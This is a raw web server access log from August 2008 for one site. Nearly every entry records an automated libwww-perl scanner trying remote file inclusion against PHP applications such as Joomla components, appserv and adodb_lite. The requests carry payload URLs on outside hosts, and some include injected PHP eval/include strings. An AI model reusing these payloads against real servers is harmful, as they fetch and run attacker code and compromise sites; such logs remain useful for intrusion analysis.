69.19.225.130 - - [27/Aug/2008:01:00:48 -0700] "GET /logs/access_080722.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.danjtams.com"
69.19.225.130 - - [27/Aug/2008:01:01:05 -0700] "GET /logs/access.log%20//appserv/main.php?appserv_root=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.danjtams.com"
69.19.225.130 - - [27/Aug/2008:01:01:06 -0700] "GET /logs//appserv/main.php?appserv_root=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.danjtams.com"
69.19.225.130 - - [27/Aug/2008:01:01:09 -0700] "GET //appserv/main.php?appserv_root=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.danjtams.com"
69.19.225.130 - - [27/Aug/2008:01:01:10 -0700] "GET //appserv/main.php?appserv_root=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.danjtams.com"
69.19.225.130 - - [27/Aug/2008:01:01:10 -0700] "GET /logs/access.log%20//appserv/main.php?appserv_root=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.danjtams.com"
69.94.97.157 - - [27/Aug/2008:01:01:11 -0700] "GET /logs/access_080722.log/errors.php?error=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
69.94.97.157 - - [27/Aug/2008:01:01:11 -0700] "GET /errors.php?error=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
69.94.97.157 - - [27/Aug/2008:01:01:11 -0700] "GET /logs/errors.php?error=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
69.19.225.130 - - [27/Aug/2008:01:01:12 -0700] "GET //appserv/main.php?appserv_root=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.danjtams.com"
69.19.225.130 - - [27/Aug/2008:01:01:12 -0700] "GET /logs/access.log%20//appserv/main.php?appserv_root=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.danjtams.com"
69.19.225.130 - - [27/Aug/2008:01:01:12 -0700] "GET /logs//appserv/main.php?appserv_root=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.danjtams.com"
69.19.225.130 - - [27/Aug/2008:01:01:13 -0700] "GET /logs//appserv/main.php?appserv_root=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.danjtams.com"
65.182.187.86 - - [27/Aug/2008:01:01:16 -0700] "GET /logs/access_080722.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.danjtams.com"
62.149.232.117 - - [27/Aug/2008:01:01:17 -0700] "GET /logs/access.log//main.php?sayfa=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
62.149.232.117 - - [27/Aug/2008:01:01:18 -0700] "GET //main.php?sayfa=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
62.149.232.117 - - [27/Aug/2008:01:01:18 -0700] "GET /logs//main.php?sayfa=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
69.94.97.157 - - [27/Aug/2008:01:01:54 -0700] "GET /logs/access_080724.log/errors.php?error=http://xwarezx.secretivens.com/a4? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
69.19.225.130 - - [27/Aug/2008:01:02:19 -0700] "GET /logs/access_080722.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.danjtams.com"
64.22.89.194 - - [27/Aug/2008:01:02:24 -0700] "GET /logs/access_080722.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://secret-admirer.info/scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.danjtams.com"
62.149.232.117 - - [27/Aug/2008:01:02:30 -0700] "GET //main.php?sayfa=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
220.133.121.243 - - [27/Aug/2008:01:02:31 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://locoputo1234.100webspace.net/bots/ids.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
220.133.121.243 - - [27/Aug/2008:01:02:31 -0700] "GET /logs/access.log//modules/TotalCalendar/about.php?inc_dir=http://locoputo1234.100webspace.net/bots/ids.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
220.133.121.243 - - [27/Aug/2008:01:02:35 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://locoputo1234.100webspace.net/bots/ids.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
216.180.250.70 - - [27/Aug/2008:01:04:29 -0700] "GET /logs/access_080717.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
216.180.250.70 - - [27/Aug/2008:01:04:30 -0700] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
216.180.250.70 - - [27/Aug/2008:01:04:30 -0700] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
216.246.46.244 - - [27/Aug/2008:01:04:33 -0700] "GET /logs/scripts.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://acc-advertising.com/img/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.danjtams.com"
216.246.46.244 - - [27/Aug/2008:01:04:33 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://acc-advertising.com/img/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.danjtams.com"
216.246.46.244 - - [27/Aug/2008:01:04:33 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://acc-advertising.com/img/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.danjtams.com"
69.19.225.130 - - [27/Aug/2008:01:05:22 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.danjtams.com"
217.128.122.28 - - [27/Aug/2008:01:05:44 -0700] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
217.128.122.28 - - [27/Aug/2008:01:05:44 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
217.128.122.28 - - [27/Aug/2008:01:05:44 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
69.19.225.130 - - [27/Aug/2008:01:06:04 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.danjtams.com"
65.38.169.228 - - [27/Aug/2008:01:06:05 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.codeduc.cl/components/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
65.38.169.228 - - [27/Aug/2008:01:06:05 -0700] "GET /logs/scripts.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.codeduc.cl/components/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
65.38.169.228 - - [27/Aug/2008:01:06:05 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.codeduc.cl/components/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
65.38.169.228 - - [27/Aug/2008:01:06:08 -0700] "GET /logs/access.log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.codeduc.cl/components/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
65.38.169.228 - - [27/Aug/2008:01:06:08 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.codeduc.cl/components/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
65.38.169.228 - - [27/Aug/2008:01:06:08 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.codeduc.cl/components/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
207.58.167.158 - - [27/Aug/2008:01:06:28 -0700] "GET /logs/access.log/netcat/htmledit//index.php?DOCUMENT_ROOT=http://www.nantucketadvertiser.com/adpics/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
207.58.167.158 - - [27/Aug/2008:01:06:28 -0700] "GET /netcat/htmledit//index.php?DOCUMENT_ROOT=http://www.nantucketadvertiser.com/adpics/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
207.58.167.158 - - [27/Aug/2008:01:06:28 -0700] "GET /logs/netcat/htmledit//index.php?DOCUMENT_ROOT=http://www.nantucketadvertiser.com/adpics/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
193.111.11.7 - - [27/Aug/2008:01:07:00 -0700] "GET /logs/access.log//main.php?sayfa=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
193.111.11.7 - - [27/Aug/2008:01:07:00 -0700] "GET /logs/access.log//main.php?sayfa=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
193.111.11.7 - - [27/Aug/2008:01:07:02 -0700] "GET //main.php?sayfa=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
193.111.11.7 - - [27/Aug/2008:01:07:02 -0700] "GET //main.php?sayfa=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
193.111.11.7 - - [27/Aug/2008:01:07:04 -0700] "GET /logs//main.php?sayfa=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
193.111.11.7 - - [27/Aug/2008:01:07:04 -0700] "GET /logs//main.php?sayfa=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
193.111.11.7 - - [27/Aug/2008:01:07:12 -0700] "GET /logs/access.log//main.php?sayfa=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
193.111.11.7 - - [27/Aug/2008:01:07:14 -0700] "GET //main.php?sayfa=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
217.128.122.28 - - [27/Aug/2008:01:07:14 -0700] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
217.128.122.28 - - [27/Aug/2008:01:07:14 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
217.128.122.28 - - [27/Aug/2008:01:07:14 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
207.58.167.158 - - [27/Aug/2008:01:07:14 -0700] "GET /logs/netcat/htmledit//index.php?DOCUMENT_ROOT=http://www.nantucketadvertiser.com/adpics/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
207.58.167.158 - - [27/Aug/2008:01:07:14 -0700] "GET /netcat/htmledit//index.php?DOCUMENT_ROOT=http://www.nantucketadvertiser.com/adpics/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
193.111.11.7 - - [27/Aug/2008:01:07:16 -0700] "GET /logs//main.php?sayfa=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
200.49.100.20 - - [27/Aug/2008:01:07:24 -0700] "GET /logs/scripts.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://veldink.com/mine/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.danjtams.com"
200.49.100.20 - - [27/Aug/2008:01:07:25 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://veldink.com/mine/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.danjtams.com"
200.49.100.20 - - [27/Aug/2008:01:07:25 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://veldink.com/mine/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.danjtams.com"
89.218.85.18 - - [27/Aug/2008:01:07:51 -0700] "GET /logs/scripts.log//admin/classes/TplLoad.php?full_path_to_public_program=http://acc-advertising.com/img/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
65.38.169.228 - - [27/Aug/2008:01:07:54 -0700] "GET /logs/access.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.codeduc.cl/components/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
65.38.169.228 - - [27/Aug/2008:01:07:54 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.codeduc.cl/components/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
65.38.169.228 - - [27/Aug/2008:01:07:54 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.codeduc.cl/components/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
216.246.46.244 - - [27/Aug/2008:01:08:45 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://acc-advertising.com/img/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.danjtams.com"
65.38.169.228 - - [27/Aug/2008:01:08:45 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.codeduc.cl/components/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
89.218.85.18 - - [27/Aug/2008:01:09:10 -0700] "GET /logs/scripts.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://acc-advertising.com/img/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
89.218.85.18 - - [27/Aug/2008:01:09:10 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://acc-advertising.com/img/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
89.218.85.18 - - [27/Aug/2008:01:09:11 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://acc-advertising.com/img/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
65.182.187.86 - - [27/Aug/2008:01:09:17 -0700] "GET /logs/access_080724.log/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.danjtams.com"
75.126.60.130 - - [27/Aug/2008:01:09:17 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://scaneru.nm.ru/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.danjtams.com"
75.126.60.130 - - [27/Aug/2008:01:09:17 -0700] "GET /logs//?path%5Bdocroot%5D=http://scaneru.nm.ru/id.txt??%0D?? HTTP/1.1" 200 1372 "-" "libwww-perl/5.811" "www.danjtams.com"
75.126.60.130 - - [27/Aug/2008:01:09:17 -0700] "GET //?path%5Bdocroot%5D=http://scaneru.nm.ru/id.txt??%0D?? HTTP/1.1" 200 779 "-" "libwww-perl/5.811" "www.danjtams.com"
75.126.60.130 - - [27/Aug/2008:01:09:29 -0700] "GET /logs//?path%5Bdocroot%5D=http://scaneru.nm.ru/id.txt??%0D?? HTTP/1.1" 200 1372 "-" "libwww-perl/5.811" "www.danjtams.com"
75.126.60.130 - - [27/Aug/2008:01:09:29 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://scaneru.nm.ru/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.danjtams.com"
75.126.60.130 - - [27/Aug/2008:01:09:29 -0700] "GET //?path%5Bdocroot%5D=http://scaneru.nm.ru/id.txt??%0D?? HTTP/1.1" 200 779 "-" "libwww-perl/5.811" "www.danjtams.com"
193.110.89.6 - - [27/Aug/2008:01:09:39 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
193.110.89.6 - - [27/Aug/2008:01:09:40 -0700] "GET /logs//appserv/main.php?appserv_root=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
193.110.89.6 - - [27/Aug/2008:01:09:40 -0700] "GET //appserv/main.php?appserv_root=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
216.180.250.70 - - [27/Aug/2008:01:09:55 -0700] "GET /logs/access_080717.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
216.180.250.70 - - [27/Aug/2008:01:09:55 -0700] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
216.180.250.70 - - [27/Aug/2008:01:09:56 -0700] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
217.128.122.28 - - [27/Aug/2008:01:10:13 -0700] "GET /logs/access.log%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
193.110.89.6 - - [27/Aug/2008:01:10:15 -0700] "GET /logs/access_080722.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
69.19.225.130 - - [27/Aug/2008:01:11:20 -0700] "GET /logs/access.log%20//appserv/main.php?appserv_root=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.danjtams.com"
69.19.225.130 - - [27/Aug/2008:01:11:20 -0700] "GET //appserv/main.php?appserv_root=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.danjtams.com"
69.19.225.130 - - [27/Aug/2008:01:11:20 -0700] "GET /logs//appserv/main.php?appserv_root=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.danjtams.com"
216.180.250.70 - - [27/Aug/2008:01:11:25 -0700] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://carrentalguru.com//templates/%20%20%20%20%20%20%20/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.danjtams.com"
217.128.122.28 - - [27/Aug/2008:01:11:44 -0700] "GET /logs/access.log%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
85.114.130.225 - - [27/Aug/2008:01:13:18 -0700] "GET /appserv/main.php?appserv_root=http://www.sfj.pt/mambo/id2.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
85.114.130.225 - - [27/Aug/2008:01:13:19 -0700] "GET /logs/access.log/appserv/main.php?appserv_root=http://www.sfj.pt/mambo/id2.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
85.114.130.225 - - [27/Aug/2008:01:13:19 -0700] "GET /logs/appserv/main.php?appserv_root=http://www.sfj.pt/mambo/id2.txt???%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
74.6.17.156 - - [27/Aug/2008:01:13:22 -0700] "GET /tmp/?N=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.danjtams.com"
69.19.225.130 - - [27/Aug/2008:01:14:20 -0700] "GET /logs/access.log//appserv/main.php?appserv_root=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.danjtams.com"
89.218.85.18 - - [27/Aug/2008:01:14:53 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://acc-advertising.com/img/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
216.246.46.244 - - [27/Aug/2008:01:15:52 -0700] "GET /logs/access.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://acc-advertising.com/img/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.danjtams.com"
202.89.35.113 - - [27/Aug/2008:01:16:26 -0700] "GET /logs/access_080722.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://avast4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.danjtams.com"
69.19.225.130 - - [27/Aug/2008:01:16:33 -0700] "GET /logs/access_080722.log//appserv/main.php?appserv_root=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.danjtams.com"
207.58.167.158 - - [27/Aug/2008:01:17:10 -0700] "GET /logs/access.log/netcat/htmledit//index.php?DOCUMENT_ROOT=http://www.nantucketadvertiser.com/adpics/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
207.58.167.158 - - [27/Aug/2008:01:17:10 -0700] "GET /netcat/htmledit//index.php?DOCUMENT_ROOT=http://www.nantucketadvertiser.com/adpics/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
207.58.167.158 - - [27/Aug/2008:01:17:10 -0700] "GET /logs/netcat/htmledit//index.php?DOCUMENT_ROOT=http://www.nantucketadvertiser.com/adpics/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
207.58.167.158 - - [27/Aug/2008:01:17:50 -0700] "GET /logs/netcat/htmledit//index.php?DOCUMENT_ROOT=http://www.nantucketadvertiser.com/adpics/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
207.58.167.158 - - [27/Aug/2008:01:17:50 -0700] "GET /netcat/htmledit//index.php?DOCUMENT_ROOT=http://www.nantucketadvertiser.com/adpics/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.danjtams.com"
69.61.35.163 - - [27/Aug/2008:01:19:43 -0700] "GET //components/com_simpleboard/file_upload.php?sbp=http://www.dariana.ro/photos/mraneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
69.61.35.163 - - [27/Aug/2008:01:19:43 -0700] "GET /logs//components/com_simpleboard/file_upload.php?sbp=http://www.dariana.ro/photos/mraneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
69.61.35.163 - - [27/Aug/2008:01:19:48 -0700] "GET /logs/access.log//components/com_simpleboard/file_upload.php?sbp=http://www.dariana.ro/photos/mraneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
69.19.225.130 - - [27/Aug/2008:01:20:13 -0700] "GET /logs/access_080722.log//appserv/main.php?appserv_root=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.danjtams.com"
218.38.54.160 - - [27/Aug/2008:01:21:34 -0700] "GET /logs/access_080724.log/errors.php?error=http://fe.unnes.ac.id/v9/themes.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
218.38.54.160 - - [27/Aug/2008:01:21:35 -0700] "GET /errors.php?error=http://fe.unnes.ac.id/v9/themes.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
218.38.54.160 - - [27/Aug/2008:01:21:36 -0700] "GET /logs/errors.php?error=http://fe.unnes.ac.id/v9/themes.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
69.19.225.130 - - [27/Aug/2008:01:21:51 -0700] "GET /logs/access_080722.log//appserv/main.php?appserv_root=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.danjtams.com"
218.38.54.160 - - [27/Aug/2008:01:22:09 -0700] "GET /logs/access_080722.log/errors.php?error=http://fe.unnes.ac.id/v9/themes.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
66.40.66.98 - - [27/Aug/2008:01:22:10 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
66.40.66.98 - - [27/Aug/2008:01:22:44 -0700] "GET /errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
66.40.66.98 - - [27/Aug/2008:01:22:45 -0700] "GET /logs/errors.php?error=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.danjtams.com"
69.19.225.130 - - [27/Aug/2008:01:22:53 -0700] "GET /logs/access_080722.log//appserv/main.php?appserv_root=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.danjtams.com"
69.61.35.163 - - [27/Aug/2008:01:24:18 -0700] "GET /logs/access.log//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.dariana.ro/photos/mraneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
69.61.35.163 - - [27/Aug/2008:01:24:18 -0700] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.dariana.ro/photos/mraneti.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.danjtams.com"
